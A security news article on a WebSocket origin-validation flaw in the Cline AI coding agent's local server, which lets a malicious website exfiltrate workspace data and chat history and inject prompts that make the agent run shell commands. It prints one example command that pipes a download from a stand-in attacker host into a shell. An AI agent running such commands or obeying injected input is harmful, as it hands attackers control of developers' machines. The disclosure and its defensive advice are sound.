Critical WebSocket Hijack Vulnerability Discovered in Cline AI Agent

In the rapidly evolving landscape of autonomous software engineering, Cline has emerged as a powerhouse. As an open-source AI coding agent, it is granted high-level privileges, including direct access to local filesystems, terminal execution, and often, sensitive cloud credentials. While this autonomy drives productivity, it also expands the attack surface in ways traditional development tools do not.

Recently, a critical security flaw was identified in Cline’s local Kanban server. Researchers at Oasis Security uncovered a vulnerability with a staggering CVSS score of 9.7. This flaw allows a malicious website to silently hijack a developer’s local environment, exfiltrate workspace intelligence, and execute arbitrary commands via the AI agent—all without the user seeing a single warning prompt.

The Technical Root Cause: WebSocket Origin Neglect

The vulnerability is rooted in the architectural implementation of the Kanban server, which manages real-time state synchronization between the management UI and active AI agent sessions. To facilitate this, the server initializes a WebSocket listener on the developer’s local machine.

The technical breakdown of the failure is twofold:

  • Lack of Origin Validation: The server fails to inspect the Origin header during the WebSocket handshake. In a secure implementation, the server should only accept connections from trusted local origins (e.g., http://localhost:xxxx).
  • Absence of Authentication: There are no cryptographic tokens or session identifiers required to establish a connection, meaning the server treats any incoming connection request as a legitimate request from the Cline UI.

Crucially, this exploit leverages a fundamental nuance of web security: while the Cross-Origin Resource Sharing (CORS) policy provides a robust defense for standard HTTP requests, WebSockets operate under a different set of rules. Because the WebSocket protocol is not strictly bound by traditional CORS preflight checks, a malicious script running in a different browser tab can initiate a connection to a local port, effectively bypassing the browser’s “Same-Origin Policy” (SOP) barrier.

Exploitation Vectors: From Intelligence Gathering to RCE

Once a cross-origin connection is successfully established, the attacker gains three primary levels of control over the developer’s machine:

1. Silent Workspace Exfiltration

The Kanban server is designed to provide a comprehensive view of the current project state. Upon connection, the attacker can request and receive a full snapshot of the developer’s workspace. This includes directory structures, Git branch metadata, task descriptions, and—most critically—the entire chat history between the developer and the AI. This history often contains sensitive context, such as API keys, internal architectural logic, or proprietary business rules.

2. Terminal Hijacking and Remote Code Execution (RCE)

The most devastating capability is the ability to interact with the AI agent’s terminal input. The vulnerability allows an attacker to inject specific strings into the communication channel that simulate user input. By crafting a malicious prompt, an attacker can “trick” the AI into executing shell commands (e.g., curl attacker.com/malware | sh). Since the AI agent is already running with the developer’s permissions, the command executes with full authority, resulting in complete system compromise.

3. Workflow Disruption (Denial of Service)

An attacker can also disrupt development cycles by sending commands to terminate active agent processes, leading to a local denial-of-service that halts productivity.

Remediation and Defensive Posture

The beauty of this disclosure is that it was handled via responsible disclosure. Cline has officially patched this vulnerability in version 0.1.66.

Immediate Actions for Developers:

  • Update Immediately: Ensure you are running Cline version 0.1.66 or higher.
  • Audit Extensions: Be cautious of browser extensions or websites that may run untrusted JavaScript in the background.

Strategic Recommendations for Security Teams:

As organizations move toward “Agentic Workflows,” the risk profile of the local machine changes. Security teams should consider the following:

  • Localhost Hardening: Utilize host-based firewalls and endpoint detection and response (EDR) tools to monitor and restrict unauthorized processes from binding to sensitive local ports.
  • Principle of Least Privilege: Whenever possible, run AI agents within containerized or sandboxed environments (such as Docker or Dev Containers) to isolate the filesystem and network from the host OS.
  • Behavioral Monitoring: Implement specialized access management controls that monitor AI agent behavior for anomalous patterns, such as unexpected shell commands or unauthorized network outbound requests.

Related Articles

Back to top button